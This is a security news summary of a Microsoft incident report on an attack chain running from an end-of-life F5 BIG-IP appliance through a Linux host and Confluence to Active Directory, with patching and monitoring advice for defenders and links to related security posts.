Security

F5 and Confluence Attack Chain Hits Hybrid Identity

3 min read

Summary

Microsoft detailed a multi-stage intrusion where attackers compromised an internet-facing F5 BIG-IP appliance, pivoted to an internal Linux host, then exploited Confluence to steal credentials and target Active Directory. The incident highlights how edge devices, Linux systems, and SaaS apps can become linked attack paths in hybrid environments, making broader monitoring and patching essential.

Need help with Security?Talk to an Expert

Introduction

Microsoft has published a new incident analysis showing how a compromise of an internet-facing edge appliance can quickly turn into a much broader enterprise breach. For security teams, the key lesson is clear: edge devices, Linux servers, internal web apps, and identity systems must all be treated as part of the same attack surface.

What happened

The attack chain began with an F5 BIG-IP Virtual Edition appliance hosted in Azure. Microsoft said the device was running an end-of-life version, making it a likely entry point through exploitation of a known vulnerability.

The threat actor then:

  • Used the F5 appliance to gain SSH access to an internal Linux server
  • Performed network discovery and reconnaissance with tools including Nmap and gowitness
  • Downloaded a custom Linux reconnaissance tool detected as HackTool:Linux/MalPack.B
  • Identified an unpatched Atlassian Confluence server and used it for remote code execution
  • Extracted credentials from Confluence configuration files
  • Attempted NTLM and Kerberos relay-style attacks against Active Directory, including activity tied to CVE-2025-33073

Microsoft noted that the attacker maintained privileged access without deploying formal persistence, relying instead on trusted access and over-privileged accounts.

Why this matters for defenders

This incident shows how modern attacks increasingly cross traditional boundaries:

  • Edge appliances are becoming high-value initial access points
  • Linux systems are often less monitored than Windows endpoints
  • Internal apps like Confluence can expose sensitive service credentials
  • Hybrid identity trust relationships can enable lateral movement that bypasses perimeter-focused defenses

Even when a vulnerable application is not internet-facing, attackers can still reach it after compromising another trusted system inside the environment.

Impact on IT administrators

Security and infrastructure teams should review whether they have:

  • Unsupported or end-of-life edge appliances still in production
  • Over-privileged Linux accounts with broad sudo access
  • Unpatched Confluence or other internal web applications
  • Monitoring coverage across network devices, Linux hosts, SaaS apps, and identity events

Organizations using Azure-hosted network appliances should also validate image versions used in ARM templates or Terraform deployments.

  • Patch or replace EOL F5 BIG-IP instances immediately
  • Audit and reduce privileged SSH access on Linux systems
  • Patch Confluence and review stored application credentials
  • Monitor for unusual cross-system authentication activity involving service accounts
  • Use Microsoft Defender XDR detections, advanced hunting, and attack path analysis to identify related exposure

The broader takeaway is that defenders should stop viewing edge, endpoint, SaaS, and identity security as separate problems. Attackers are already treating them as one connected path.

Need help with Security?

Our experts can help you implement and optimize your Microsoft solutions.

Talk to an Expert

Stay updated on Microsoft technologies

Read the original article by Microsoft Defender Security Research Team
F5 BIG-IPConfluenceMicrosoft Defender XDRLinux securityActive Directory

Related Posts

Security

npm Dependency Confusion Attack Targets Developer Environments

Microsoft Threat Intelligence uncovered 33 malicious npm packages that abused dependency confusion to impersonate internal corporate packages and silently profile developer systems during installation. The campaign matters because it targets developer workstations and CI/CD environments, creating a foothold for potential follow-on supply chain attacks.

Security

Microsoft Defender Named a 2026 Endpoint Leader

Microsoft says it has been named a Leader in the 2026 Gartner Magic Quadrant for Endpoint Protection for the seventh consecutive time. The announcement highlights recent Microsoft Defender for Endpoint enhancements, including attack disruption, custom telemetry, simplified onboarding, sovereign-ready deployment options, and protection for local AI agents.

Security

Typosquatted npm Packages Steal Cloud and CI/CD Secrets

Microsoft has uncovered an active npm supply chain attack in which 14 typosquatted packages stole AWS credentials, HashiCorp Vault tokens, GitHub Actions data, and npm publish tokens during installation. The campaign matters because it targets developer and build environments, creating risk of cloud lateral movement, CI/CD compromise, and downstream software supply chain attacks.

Security

The Gentlemen Ransomware: Self-Propagating Go Threat

Microsoft Threat Intelligence has published a deep technical analysis of The Gentlemen ransomware, a Go-based ransomware-as-a-service threat that combines strong file encryption with aggressive self-propagation. The research matters for defenders because the malware can rapidly spread across local systems and network shares, increasing the blast radius of a single compromise.

Security

Cryptojacking Campaign Abuses ScreenConnect and .NET

Microsoft has detailed an active cryptojacking campaign that uses poisoned search results and AI chatbot recommendations to lure users to fake software download sites. The attack abuses DLL sideloading, ScreenConnect, and Microsoft .NET utilities to gain persistent access and mine cryptocurrency on high-GPU systems, raising the risk of follow-on activity such as data theft or ransomware.

Security

Microsoft Security AI Foundations: Customer Success

Microsoft highlighted how St. Luke’s and ManpowerGroup are building AI-ready security foundations with Microsoft Security, Microsoft Sentinel, Microsoft Defender, and Security Copilot. The stories show why unified visibility, automation, and Zero Trust controls are becoming essential for organizations that want to scale AI without increasing risk.